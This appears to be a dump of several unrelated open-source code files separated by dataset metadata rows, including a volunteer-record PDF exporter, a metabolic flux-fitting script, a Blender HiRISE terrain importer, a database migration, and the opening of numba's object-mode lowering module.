#ectable = s3db.pr_contact_emergency
#emergency = db(ectable.pe_id == pe_id).select(ectable.name,
# ectable.relationship,
# ectable.phone,
# limitby=(0, 1)).first()
#if emergency:
# econtact = TABLE(TR(TH(T("Emergency Contact"))),
# TR(emergency.name),
# TR(emergency.relationship),
# TR(emergency.phone),
# )
#else:
# econtact = TABLE()
contact_row = TR()
if len(address_list) > 0:
contact_row.append(TD(address_list[0]))
if len(address_list) > 1:
contact_row.append(TD(address_list[1]))
contact_row.append(contact_list)
#contact_row.append(econtact)
# Identity
idtable = s3db.pr_identity
query = (idtable.person_id == person_id) & \
(idtable.deleted == False)
rows = db(query).select(idtable.type,
idtable.value,
idtable.valid_until)
id_row = TR()
for identity in rows:
id_row.append(TABLE(TR(TH(idtable.type.represent(identity.type))),
TR(identity.value),
TR(identity.valid_until),
))
# Comments:
comments = person.comments or ""
if comments:
comments = TABLE(TR(TH(T("Comments"))),
TR(comments))
# Training Courses
hours = {}
ttable = s3db.hrm_training
ctable = s3db.hrm_course
query = (ttable.deleted == False) & \
(ttable.person_id == person_id) & \
(ttable.course_id == ctable.id)
rows = db(query).select(ctable.name,
ttable.date,
ttable.hours,
orderby = ~ttable.date)
date_represent = ttable.date.represent
for row in rows:
_row = row["hrm_training"]
_date = _row.date
hours[_date.date()] = dict(course = row["hrm_course"].name,
date = date_represent(_date),
hours = _row.hours or "",
)
courses = TABLE(TR(TH(T("Date")),
TH(T("Training")),
TH(T("Hours"))))
_hours = {}
for key in sorted(hours.iterkeys()):
_hours[key] = hours[key]
total = 0
for hour in hours:
_hour = hours[hour]
__hours = _hour["hours"] or 0
courses.append(TR(_hour["date"],
_hour["course"],
str(__hours)
))
total += __hours
if total > 0:
courses.append(TR(TD(""), TD("Total"), TD("%d" % total)))
# Programme Hours
# - grouped by Programme/Role
programmes = OrderedDict()
hrstable = s3db.hrm_programme_hours
ptable = db.hrm_programme
jtable = db.hrm_job_title
query = (hrstable.deleted == False) & \
(hrstable.training == False) & \
(hrstable.person_id == person_id) & \
(hrstable.programme_id == ptable.id)
left = jtable.on(hrstable.job_title_id == jtable.id)
rows = db(query).select(hrstable.date,
hrstable.hours,
jtable.name,
ptable.name,
ptable.name_long,
left=left,
orderby = ~hrstable.date)
NONE = current.messages["NONE"]
for row in rows:
_row = row["hrm_programme_hours"]
_date = _row.date
hours = _row.hours or 0
role = row["hrm_job_title"]["name"] or NONE
prow = row["hrm_programme"]
if prow.name_long:
programme = prow.name_long
else:
programme = prow.name
if programme not in programmes:
programmes[programme] = OrderedDict()
p = programmes[programme]
if role in p:
p[role]["end_date"] = _date
p[role]["hours"] += hours
else:
p[role] = dict(start_date = _date,
end_date = _date,
hours = hours,
)
date_represent = hrstable.date.represent
programme = TABLE(TR(TH(T("Start Date")),
TH(T("End Date")),
TH(T("Work on Program")),
TH(T("Role")),
TH(T("Hours"))))
total = 0
for p in programmes:
_p = programmes[p]
for r in _p:
role = _p[r]
hours = role["hours"]
total += hours
programme.append(TR(date_represent(role["start_date"]),
date_represent(role["end_date"]),
p,
r,
str(hours)
))
if total > 0:
programme.append(TR("", "", "", TD("Total"), TD("%d" % total)))
# Space for the printed document to be signed
datestamp = S3DateTime.date_represent(current.request.now)
datestamp = "%s: %s" % (T("Date Printed"), datestamp)
manager = T("Branch Coordinator")
signature = TABLE(TR(TH(T("Signature"))),
TR(TD()),
TR(TD(manager)),
TR(TD(datestamp)))
output = DIV(TABLE(TR(TH(T("Volunteer Service Record")))),
person_details,
TABLE(contact_row),
TABLE(id_row),
TABLE(comments),
TABLE(courses),
TABLE(programme),
TABLE(signature),
)
return output
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "list",
pdf_title = "%s - %s" % \
(vol_name, T("Volunteer Service Record")),
pdf_table_autogrow = "B",
pdf_callback = callback,
**attr
)
# END =========================================================================
| mit | 3,607,100,593,541,855,700 | 41.005831 | 117 | 0.420391 | false | 5.100177 | false | false | false |
dandanvidi/in-vivo-enzyme-kinetics | scripts/handle_fluxomics.py | 3 | 7038 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 14 17:15:01 2016
@author: dan
"""
import re, pulp
import pandas as pd
import matplotlib.pyplot as plt
from cobra.io.sbml import create_cobra_model_from_sbml_file
from cobra.manipulation.modify import convert_to_irreversible
#from ..scripts.despine_axes import despine
def despine(ax, fontsize=15):
ax.tick_params(right=0, top=0, direction='out', labelsize=fontsize)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.set_xlabel(ax.get_xlabel(), size=15)
ax.set_ylabel(ax.get_ylabel(), size=15)
#%%
rid_mapping = pd.DataFrame.from_csv("../source/rid_mapping_cobra_2_Gerosa.csv")
MFA = pd.DataFrame.from_csv('../source/mmol_gCDW_hr_[Gerosa et al 2015].csv',
index_col=1)
MFA_std = pd.DataFrame.from_csv('../source/mmol_gCDW_hr_stdev_[Gerosa et al 2015].csv',
index_col=1)
conditions = pd.DataFrame.from_csv("../data/conditions.csv")
conditions = conditions[conditions.media_key>0]
conditions.sort_values('growth rate Gerosa [h-1]', inplace=True)
cs = conditions.index
#%%
measured_flux = pd.DataFrame(columns=cs, index=rid_mapping.index)
measured_flux_stdev = pd.DataFrame(columns=cs, index=rid_mapping.index)
for row in MFA.iterrows():
if not re.findall("[+-]", row[0]):
for r in row[0].split(';'):
cobra_reactions = rid_mapping[rid_mapping['gerosa_reaction_id']==r]
for r_cobra in cobra_reactions.index:
v = row[1]
measured_flux.loc[r_cobra] = v
measured_flux_stdev.loc[r_cobra] = MFA_std.loc[row[0]]
measured_flux.dropna(inplace=True)
measured_flux_stdev.dropna(inplace=True)
#%%
model = create_cobra_model_from_sbml_file('../source/iJO1366.xml')
all_reactions = map(str, model.reactions)
all_metabolites = map(str, model.metabolites)
mmol_gCDW_h = pd.DataFrame(columns=cs, index=measured_flux.index)
for c in cs:
cobra_c = conditions.loc[c, 'media_key']
gr = conditions.loc[c, 'growth rate Gerosa [h-1]']
flux_meas = measured_flux[c]
flux_stderr = measured_flux_stdev[c]
# load fresh copy of model
model = create_cobra_model_from_sbml_file('../source/iJO1366.xml')
# redefine sole carbon source uptake reaction in mmol/gr/h
model.reactions.get_by_id('EX_glc_e').lower_bound = 0
model.reactions.get_by_id('EX_' + cobra_c + '_e').lower_bound = -1000
# set growth rate according to measurements
biomass = "Ec_biomass_iJO1366_WT_53p95M"
growth_rate = model.reactions.get_by_id(biomass)
growth_rate.upper_bound = gr
growth_rate.lower_bound = gr
bounds_df = pd.DataFrame(index=all_reactions,columns=['lb','ub'])
m = model.to_array_based_model()
bounds_df.loc[all_reactions, 'lb'] = m.lower_bounds
bounds_df.loc[all_reactions, 'ub'] = m.upper_bounds
# initialize LP problem
pulp_solver = pulp.CPLEX(msg=0)
lp = pulp.LpProblem("MOMA", pulp.LpMinimize)
v_pred = pulp.LpVariable.dicts('v_pred', all_reactions)
v_meas = pulp.LpVariable.dicts('v_meas', all_reactions)
v_resid = pulp.LpVariable.dicts('residual', all_reactions)
# add flux bounds
for i in all_reactions:
lp += (v_pred[i] >= bounds_df.loc[i, 'lb']), 'lower_bound_%s' % i
lp += (v_pred[i] <= bounds_df.loc[i, 'ub']), 'upper_bound_%s' % i
# add constraint for each measured reaction i:
# |v_meas[i] - flux_meas[i]| <= flux_stderr[i]
# v_resid[i] >= |v_pred[i] - v_meas[i]|
for i in flux_meas.index:
lp += (v_meas[i] <= flux_meas[i] + flux_stderr[i]), 'measured_upper_%s' % i
lp += (v_meas[i] >= flux_meas[i] - flux_stderr[i]), 'measured_lower_%s' % i
lp += (v_pred[i] - v_resid[i] <= v_meas[i]), 'abs_diff_upper_%s' % i
lp += (-v_pred[i] - v_resid[i] <= -v_meas[i]), 'abs_diff_lower_%s' % i
# Some reactions in Gerosa et al. 2015 share constraints with other reactions
# here we manually constrain their fluxes according to measuremnts.
# Acetate exchange
lp += (v_meas['ACt2rpp'] + v_meas['ACS'] <= MFA.loc['PTAr+ACS', c] + MFA_std.loc['PTAr+ACS', c])
lp += (v_meas['ACt2rpp'] + v_meas['ACS'] >= MFA.loc['PTAr+ACS', c] - MFA_std.loc['PTAr+ACS', c])
# PFK/FBP reversible reaction
lp += (v_meas['PFK'] - v_meas['FBP'] <= MFA.loc['PFK-FBP', c] + MFA_std.loc['PFK-FBP', c])
lp += (v_meas['PFK'] - v_meas['FBP'] >= MFA.loc['PFK-FBP', c] - MFA_std.loc['PFK-FBP', c])
# MDH/MQO alternative
lp += (v_meas['MDH'] + v_meas['MDH2'] <= MFA.loc['MDH+MQO', c] + MFA_std.loc['MDH+MQO', c])
lp += (v_meas['MDH'] + v_meas['MDH2'] >= MFA.loc['MDH+MQO', c] - MFA_std.loc['MDH+MQO', c])
# ME alternative
lp += (v_meas['ME1'] + v_meas['ME2'] <= MFA.loc['ME1+ME2', c] + MFA_std.loc['ME1+ME2', c])
lp += (v_meas['ME1'] + v_meas['ME2'] >= MFA.loc['ME1+ME2', c] - MFA_std.loc['ME1+ME2', c])
# set the objective to minimize sum_i abs_diff[i]
objective = pulp.lpSum(v_resid.values())
lp.setObjective(objective)
# add stoichiometric constraints for all internal metabolites: S_int * v = 0
for i,j in enumerate(m.S):
row = [l * v_pred[all_reactions[k]] for k,l in zip(j.rows[0],j.data[0])]
lp += (pulp.lpSum(row) == 0), 'mass_balance_%s' % all_metabolites[i]
lp.solve()
# append fluxes to new dataframe
MEAS_FLUX_L = 'measured fluxes from Gerosa et al.'
MEAS_STDEV_L = 'standard deviation'
PRED_FLUX_L = 'projected fluxes'
RESID_L = 'residual'
fluxes_df = pd.DataFrame(index=all_reactions)
fluxes_df.loc[flux_meas.index, MEAS_FLUX_L] = flux_meas
fluxes_df.loc[flux_meas.index, MEAS_STDEV_L] = flux_stderr
fluxes_df.loc[all_reactions, PRED_FLUX_L] = \
map(lambda i: pulp.value(v_pred[i]), all_reactions)
fluxes_df.loc[measured_flux.index, RESID_L] = \
map(lambda i: pulp.value(v_resid[i]), measured_flux.index)
mmol_gCDW_h[c] = fluxes_df.loc[measured_flux.index, PRED_FLUX_L]
#%%
# normalize all fluxes to the biomass flux (i.e. set it to 1)
fluxes_df /= pulp.value(v_pred[biomass])
fig = plt.figure(figsize=(6,6))
ax = plt.axes()
fluxes_df.plot(kind='scatter', x=MEAS_FLUX_L, y=PRED_FLUX_L,
xerr=MEAS_STDEV_L, ax=ax, linewidth=0, s=20,
color=(0.7,0.2,0.5))
xlim, ylim = (ax.get_ylim(), ax.get_ylim())
plt.axis('equal')
plt.plot(xlim, ylim)
plt.xlim(xlim)
plt.ylim(ylim)
despine(ax)
ax.set_title(c, size=15)
for i in flux_meas.index:
xy = fluxes_df.loc[i, [MEAS_FLUX_L, PRED_FLUX_L]]
if fluxes_df.loc[i, RESID_L] > 2:
ax.annotate(i, xy,
fontsize=10, color='darkslategrey')
fig.savefig('../res/flux_projections/flux_projection_on_%s.pdf' %c)
mmol_gCDW_h.to_csv('../data/flux projections[mmol_gCDW_h].csv')
| mit | -7,854,915,232,658,990,000 | 39.217143 | 100 | 0.603581 | false | 2.68626 | false | false | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/addons/io_convert_image_to_mesh_img/import_img.py | 8 | 23824 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
This script can import a HiRISE DTM .IMG file.
"""
import bpy
from bpy.props import *
from struct import pack, unpack
import os
import queue, threading
class image_properties:
""" keeps track of image attributes throughout the hirise_dtm_importer class """
def __init__(self, name, dimensions, pixel_scale):
self.name( name )
self.dims( dimensions )
self.processed_dims( dimensions )
self.pixel_scale( pixel_scale )
def dims(self, dims=None):
if dims is not None:
self.__dims = dims
return self.__dims
def processed_dims(self, processed_dims=None):
if processed_dims is not None:
self.__processed_dims = processed_dims
return self.__processed_dims
def name(self, name=None):
if name is not None:
self.__name = name
return self.__name
def pixel_scale(self, pixel_scale=None):
if pixel_scale is not None:
self.__pixel_scale = pixel_scale
return self.__pixel_scale
class hirise_dtm_importer(object):
""" methods to understand/import a HiRISE DTM formatted as a PDS .IMG """
def __init__(self, context, filepath):
self.__context = context
self.__filepath = filepath
self.__ignore_value = 0x00000000
self.__bin_mode = 'BIN6'
self.scale( 1.0 )
self.__cropXY = False
def bin_mode(self, bin_mode=None):
if bin_mode != None:
self.__bin_mode = bin_mode
return self.__bin_mode
def scale(self, scale=None):
if scale is not None:
self.__scale = scale
return self.__scale
def crop(self, widthX, widthY, offX, offY):
self.__cropXY = [ widthX, widthY, offX, offY ]
return self.__cropXY
############################################################################
## PDS Label Operations
############################################################################
def parsePDSLabel(self, labelIter, currentObjectName=None, level = ""):
# Let's parse this thing... semi-recursively
## I started writing this caring about everything in the PDS standard but ...
## it's a mess and I only need a few things -- thar be hacks below
## Mostly I just don't care about continued data from previous lines
label_structure = []
# When are we done with this level?
endStr = "END"
if not currentObjectName is None:
endStr = "END_OBJECT = %s" % currentObjectName
line = ""
while not line.rstrip() == endStr:
line = next(labelIter)
# Get rid of comments
comment = line.find("/*")
if comment > -1:
line = line[:comment]
# Take notice of objects
if line[:8] == "OBJECT =":
objName = line[8:].rstrip()
label_structure.append(
(
objName.lstrip().rstrip(),
self.parsePDSLabel(labelIter, objName.lstrip().rstrip(), level + " ")
)
)
elif line.find("END_OBJECT =") > -1:
pass
elif len(line.rstrip().lstrip()) > 0:
key_val = line.split(" = ", 2)
if len(key_val) == 2:
label_structure.append( (key_val[0].rstrip().lstrip(), key_val[1].rstrip().lstrip()) )
return label_structure
# There has got to be a better way in python?
def iterArr(self, label):
for line in label:
yield line
def getPDSLabel(self, img):
# Just takes file and stores it into an array for later use
label = []
done = False;
# Grab label into array of lines
while not done:
line = str(img.readline(), 'utf-8')
if line.rstrip() == "END":
done = True
label.append(line)
return (label, self.parsePDSLabel(self.iterArr(label)))
def getLinesAndSamples(self, label):
""" uses the parsed PDS Label to get the LINES and LINE_SAMPLES parameters
from the first object named "IMAGE" -- is hackish
"""
for obj in label:
if obj[0] == "IMAGE":
return self.getLinesAndSamples(obj[1])
if obj[0] == "LINES":
lines = int(obj[1])
if obj[0] == "LINE_SAMPLES":
line_samples = int(obj[1])
return ( line_samples, lines )
def getValidMinMax(self, label):
""" uses the parsed PDS Label to get the VALID_MINIMUM and VALID_MAXIMUM parameters
from the first object named "IMAGE" -- is hackish
"""
for obj in label:
if obj[0] == "IMAGE":
return self.getValidMinMax(obj[1])
if obj[0] == "VALID_MINIMUM":
vmin = float(obj[1])
if obj[0] == "VALID_MAXIMUM":
vmax = float(obj[1])
return vmin, vmax
def getMissingConstant(self, label):
""" uses the parsed PDS Label to get the MISSING_CONSTANT parameter
from the first object named "IMAGE" -- is hackish
"""
for obj in label:
if obj[0] == "IMAGE":
return self.getMissingConstant(obj[1])
if obj[0] == "MISSING_CONSTANT":
bit_string_repr = obj[1]
# This is always the same for a HiRISE image, so we are just checking it
# to be a little less insane here. If someone wants to support another
# constant then go for it. Just make sure this one continues to work too
pieces = bit_string_repr.split("#")
if pieces[0] == "16" and pieces[1] == "FF7FFFFB":
ignore_value = unpack("f", pack("I", 0xFF7FFFFB))[0]
return ( ignore_value )
############################################################################
## Image operations
############################################################################
def bin2(self, image_iter, bin2_method_type="SLOW"):
""" this is an iterator that: Given an image iterator will yield binned lines """
ignore_value = self.__ignore_value
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//2, processed_dims[1]//2 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*2, pixel_scale[1]*2 )
img_props.pixel_scale( pixel_scale )
yield img_props
# Take two lists [a1, a2, a3], [b1, b2, b3] and combine them into one
# list of [a1 + b1, a2+b2, ... ] as long as both values are not ignorable
combine_fun = lambda a, b: a != ignore_value and b != ignore_value and (a + b)/2 or ignore_value
line_count = 0
ret_list = []
for line in image_iter:
if line_count == 1:
line_count = 0
tmp_list = list(map(combine_fun, line, last_line))
while len(tmp_list) > 1:
ret_list.append( combine_fun( tmp_list[0], tmp_list[1] ) )
del tmp_list[0:2]
yield ret_list
ret_list = []
else:
last_line = line
line_count += 1
def bin6(self, image_iter, bin6_method_type="SLOW"):
""" this is an iterator that: Given an image iterator will yield binned lines """
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//6, processed_dims[1]//6 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*6, pixel_scale[1]*6 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin6_method_type == "FAST":
bin6_method = self.bin6_real_fast
else:
bin6_method = self.bin6_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 6:
yield bin6_method( raw_data )
line_count = 0
raw_data = []
def bin6_real(self, raw_data):
""" does a 6x6 sample of raw_data and returns a single line of data """
# TODO: make this more efficient
binned_data = []
# Filter out those unwanted hugely negative values...
IGNORE_VALUE = self.__ignore_value
base = 0
for i in range(0, len(raw_data[0])//6):
ints = (raw_data[0][base:base+6] +
raw_data[1][base:base+6] +
raw_data[2][base:base+6] +
raw_data[3][base:base+6] +
raw_data[4][base:base+6] +
raw_data[5][base:base+6] )
ints = [num for num in ints if num != IGNORE_VALUE]
# If we have all pesky values, return a pesky value
if not ints:
binned_data.append( IGNORE_VALUE )
else:
binned_data.append( sum(ints, 0.0) / len(ints) )
base += 6
return binned_data
def bin6_real_fast(self, raw_data):
""" takes a single value from each 6x6 sample of raw_data and returns a single line of data """
# TODO: make this more efficient
binned_data = []
base = 0
for i in range(0, len(raw_data[0])//6):
binned_data.append( raw_data[0][base] )
base += 6
return binned_data
def bin12(self, image_iter, bin12_method_type="SLOW"):
""" this is an iterator that: Given an image iterator will yield binned lines """
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//12, processed_dims[1]//12 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*12, pixel_scale[1]*12 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin12_method_type == "FAST":
bin12_method = self.bin12_real_fast
else:
bin12_method = self.bin12_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 12:
yield bin12_method( raw_data )
line_count = 0
raw_data = []
def bin12_real(self, raw_data):
""" does a 12x12 sample of raw_data and returns a single line of data """
binned_data = []
# Filter out those unwanted hugely negative values...
filter_fun = lambda a: self.__ignore_value.__ne__(a)
base = 0
for i in range(0, len(raw_data[0])//12):
ints = list(filter( filter_fun, raw_data[0][base:base+12] +
raw_data[1][base:base+12] +
raw_data[2][base:base+12] +
raw_data[3][base:base+12] +
raw_data[4][base:base+12] +
raw_data[5][base:base+12] +
raw_data[6][base:base+12] +
raw_data[7][base:base+12] +
raw_data[8][base:base+12] +
raw_data[9][base:base+12] +
raw_data[10][base:base+12] +
raw_data[11][base:base+12] ))
len_ints = len( ints )
# If we have all pesky values, return a pesky value
if len_ints == 0:
binned_data.append( self.__ignore_value )
else:
binned_data.append( sum(ints) / len(ints) )
base += 12
return binned_data
def bin12_real_fast(self, raw_data):
""" takes a single value from each 12x12 sample of raw_data and returns a single line of data """
return raw_data[0][11::12]
def cropXY(self, image_iter, XSize=None, YSize=None, XOffset=0, YOffset=0):
""" return a cropped portion of the image """
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
if XSize is None:
XSize = processed_dims[0]
if YSize is None:
YSize = processed_dims[1]
if XSize + XOffset > processed_dims[0]:
XSize = processed_dims[0]
XOffset = 0
if YSize + YOffset > processed_dims[1]:
YSize = processed_dims[1]
YOffset = 0
img_props.processed_dims( (XSize, YSize) )
yield img_props
currentY = 0
for line in image_iter:
if currentY >= YOffset and currentY <= YOffset + YSize:
yield line[XOffset:XOffset+XSize]
# Not much point in reading the rest of the data...
if currentY == YOffset + YSize:
return
currentY += 1
def getImage(self, img, img_props):
""" Assumes 32-bit pixels -- bins image """
dims = img_props.dims()
# setup to unpack more efficiently.
x_len = dims[0]
# little endian (PC_REAL)
unpack_str = "<"
# unpack_str = ">"
unpack_bytes_str = "<"
pack_bytes_str = "="
# 32 bits/sample * samples/line = y_bytes (per line)
x_bytes = 4*x_len
for x in range(0, x_len):
# 32-bit float is "d"
unpack_str += "f"
unpack_bytes_str += "I"
pack_bytes_str += "I"
# Each iterator yields this first ... it is for reference of the next iterator:
yield img_props
for y in range(0, dims[1]):
# pixels is a byte array
pixels = b''
while len(pixels) < x_bytes:
new_pixels = img.read( x_bytes - len(pixels) )
pixels += new_pixels
if len(new_pixels) == 0:
x_bytes = -1
pixels = []
if len(pixels) == x_bytes:
if 0 == 1:
repacked_pixels = b''
for integer in unpack(unpack_bytes_str, pixels):
repacked_pixels += pack("=I", integer)
yield unpack( unpack_str, repacked_pixels )
else:
yield unpack( unpack_str, pixels )
def shiftToOrigin(self, image_iter, image_min_max):
""" takes a generator and shifts the points by the valid minimum
also removes points with value self.__ignore_value and replaces them with None
"""
# use the passed in values ...
valid_min = image_min_max[0]
# pass on dimensions/pixel_scale since we don't modify them here
yield next(image_iter)
# closures rock!
def normalize_fun(point):
if point == self.__ignore_value:
return None
return point - valid_min
for line in image_iter:
yield list(map(normalize_fun, line))
def scaleZ(self, image_iter, scale_factor):
""" scales the mesh values by a factor """
# pass on dimensions since we don't modify them here
yield next(image_iter)
scale_factor = self.scale()
def scale_fun(point):
try:
return point * scale_factor
except:
return None
for line in image_iter:
yield list(map(scale_fun, line))
def genMesh(self, image_iter):
"""Returns a mesh object from an image iterator this has the
value-added feature that a value of "None" is ignored
"""
# Get the output image size given the above transforms
img_props = next(image_iter)
# Let's interpolate the binned DTM with blender -- yay meshes!
coords = []
faces = []
face_count = 0
coord = -1
max_x = img_props.processed_dims()[0]
max_y = img_props.processed_dims()[1]
scale_x = self.scale() * img_props.pixel_scale()[0]
scale_y = self.scale() * img_props.pixel_scale()[1]
line_count = 0
# seed the last line (or previous line) with a line
last_line = next(image_iter)
point_offset = 0
previous_point_offset = 0
# Let's add any initial points that are appropriate
x = 0
point_offset += len( last_line ) - last_line.count(None)
for z in last_line:
if z != None:
coords.append( (x*scale_x, 0.0, z) )
coord += 1
x += 1
# We want to ignore points with a value of "None" but we also need to create vertices
# with an index that we can re-create on the next line. The solution is to remember
# two offsets: the point offset and the previous point offset.
# these offsets represent the point index that blender gets -- not the number of
# points we have read from the image
# if "x" represents points that are "None" valued then conceptually this is how we
# think of point indices:
#
# previous line: offset0 x x +1 +2 +3
# current line: offset1 x +1 +2 +3 x
# once we can map points we can worry about making triangular or square faces to fill
# the space between vertices so that blender is more efficient at managing the final
# structure.
# read each new line and generate coordinates+faces
for dtm_line in image_iter:
# Keep track of where we are in the image
line_count += 1
y_val = line_count*-scale_y
# Just add all points blindly
# TODO: turn this into a map
x = 0
for z in dtm_line:
if z != None:
coords.append( (x*scale_x, y_val, z) )
coord += 1
x += 1
# Calculate faces
for x in range(0, max_x - 1):
vals = [
last_line[ x + 1 ],
last_line[ x ],
dtm_line[ x ],
dtm_line[ x + 1 ],
]
# Two or more values of "None" means we can ignore this block
none_val = vals.count(None)
# Common case: we can create a square face
if none_val == 0:
faces.append( (
previous_point_offset,
previous_point_offset+1,
point_offset+1,
point_offset,
) )
face_count += 1
elif none_val == 1:
# special case: we can implement a triangular face
## NB: blender 2.5 makes a triangular face when the last coord is 0
# TODO: implement a triangular face
pass
if vals[1] != None:
previous_point_offset += 1
if vals[2] != None:
point_offset += 1
# Squeeze the last point offset increment out of the previous line
if last_line[-1] != None:
previous_point_offset += 1
# Squeeze the last point out of the current line
if dtm_line[-1] != None:
point_offset += 1
# remember what we just saw (and forget anything before that)
last_line = dtm_line
me = bpy.data.meshes.new(img_props.name()) # create a new mesh
#from_pydata(self, vertices, edges, faces)
#Make a mesh from a list of vertices/edges/faces
#Until we have a nicer way to make geometry, use this.
#:arg vertices:
# float triplets each representing (X, Y, Z)
# eg: [(0.0, 1.0, 0.5), ...].
#:type vertices: iterable object
#:arg edges:
# int pairs, each pair contains two indices to the
# *vertices* argument. eg: [(1, 2), ...]
#:type edges: iterable object
#:arg faces:
# iterator of faces, each faces contains three or more indices to
# the *vertices* argument. eg: [(5, 6, 8, 9), (1, 2, 3), ...]
#:type faces: iterable object
me.from_pydata(coords, [], faces)
# me.vertices.add(len(coords)/3)
# me.vertices.foreach_set("co", coords)
# me.faces.add(len(faces)/4)
# me.faces.foreach_set("vertices_raw", faces)
me.update()
bin_desc = self.bin_mode()
if bin_desc == 'NONE':
bin_desc = 'No Bin'
ob=bpy.data.objects.new("DTM - %s" % bin_desc, me)
return ob
################################################################################
# Yay, done with importer functions ... let's see the abstraction in action! #
################################################################################
def execute(self):
img = open(self.__filepath, 'rb')
(label, parsedLabel) = self.getPDSLabel(img)
image_dims = self.getLinesAndSamples(parsedLabel)
img_min_max_vals = self.getValidMinMax(parsedLabel)
self.__ignore_value = self.getMissingConstant(parsedLabel)
# MAGIC VALUE? -- need to formalize this to rid ourselves of bad points
img.seek(28)
# Crop off 4 lines
img.seek(4*image_dims[0])
# HiRISE images (and most others?) have 1m x 1m pixels
pixel_scale=(1, 1)
# The image we are importing
image_name = os.path.basename( self.__filepath )
# Set the properties of the image in a manageable object
img_props = image_properties( image_name, image_dims, pixel_scale )
# Get an iterator to iterate over lines
image_iter = self.getImage(img, img_props)
## Wrap the image_iter generator with other generators to modify the dtm on a
## line-by-line basis. This creates a stream of modifications instead of reading
## all of the data at once, processing all of the data (potentially several times)
## and then handing it off to blender
## TODO: find a way to alter projection based on transformations below
if self.__cropXY:
image_iter = self.cropXY(image_iter,
XSize=self.__cropXY[0],
YSize=self.__cropXY[1],
XOffset=self.__cropXY[2],
YOffset=self.__cropXY[3]
)
# Select an appropriate binning mode
## TODO: generalize the binning fn's
bin_mode = self.bin_mode()
bin_mode_funcs = {
'BIN2': self.bin2(image_iter),
'BIN6': self.bin6(image_iter),
'BIN6-FAST': self.bin6(image_iter, 'FAST'),
'BIN12': self.bin12(image_iter),
'BIN12-FAST': self.bin12(image_iter, 'FAST')
}
if bin_mode in bin_mode_funcs.keys():
image_iter = bin_mode_funcs[ bin_mode ]
image_iter = self.shiftToOrigin(image_iter, img_min_max_vals)
if self.scale != 1.0:
image_iter = self.scaleZ(image_iter, img_min_max_vals)
# Create a new mesh object and set data from the image iterator
ob_new = self.genMesh(image_iter)
if img:
img.close()
# Add mesh object to the current scene
scene = self.__context.scene
scene.objects.link(ob_new)
scene.update()
# deselect other objects
bpy.ops.object.select_all(action='DESELECT')
# scene.objects.active = ob_new
# Select the new mesh
ob_new.select = True
return ('FINISHED',)
def load(operator, context, filepath, scale, bin_mode, cropVars):
print("Bin Mode: %s" % bin_mode)
print("Scale: %f" % scale)
importer = hirise_dtm_importer(context,filepath)
importer.bin_mode( bin_mode )
importer.scale( scale )
if cropVars:
importer.crop( cropVars[0], cropVars[1], cropVars[2], cropVars[3] )
importer.execute()
print("Loading %s" % filepath)
return {'FINISHED'}
| gpl-2.0 | 3,059,977,963,649,307,000 | 32.413745 | 103 | 0.569384 | false | 3.755951 | false | false | false |
ubc/compair | alembic/versions/3f3dd5a97fc7_added_practice_column_to_answers.py | 1 | 1598 | """Added practice column to answers
Revision ID: 3f3dd5a97fc7
Revises: 17b7bd2e218c
Create Date: 2016-08-19 12:55:40.174238
"""
# revision identifiers, used by Alembic.
revision = '3f3dd5a97fc7'
down_revision = '17b7bd2e218c'
from alembic import op
import sqlalchemy as sa
from compair.models import convention
def upgrade():
with op.batch_alter_table('answer', naming_convention=convention) as batch_op:
batch_op.add_column(sa.Column('practice', sa.Boolean(), default=False, server_default='0', nullable=False))
op.create_index(op.f('ix_answer_practice'), 'answer', ['practice'], unique=False)
connection = op.get_bind()
comparison_example_table = sa.table('comparison_example',
sa.Column('answer1_id', sa.Integer),
sa.Column('answer2_id', sa.Integer),
)
answer_table = sa.table('answer',
sa.column('id', sa.Integer),
sa.Column('practice', sa.Boolean)
)
answer_ids = set()
for comparison_example in connection.execute(comparison_example_table.select()):
answer_ids.add(comparison_example.answer1_id)
answer_ids.add(comparison_example.answer2_id)
answer_ids = list(answer_ids)
if len(answer_ids) > 0:
connection.execute(
answer_table.update().where(
answer_table.c.id.in_(answer_ids)
).values(
practice=True
)
)
def downgrade():
with op.batch_alter_table('answer', naming_convention=convention) as batch_op:
batch_op.drop_index('ix_answer_practice')
batch_op.drop_column('practice') | gpl-3.0 | -2,098,296,261,962,190,800 | 29.169811 | 115 | 0.654568 | false | 3.315353 | false | false | false |
pitrou/numba | numba/objmode.py | 3 | 20724 | """
Lowering implementation for object mode.
"""
from __future__ import print_function, division, absolute_import
from llvmlite.llvmpy.core import Type, Constant
import llvmlite.llvmpy.core as lc
from . import cgutils, generators, ir, types, utils
from .errors import ForbiddenConstruct
from .lowering import BaseLower
from .utils import builtins, intern
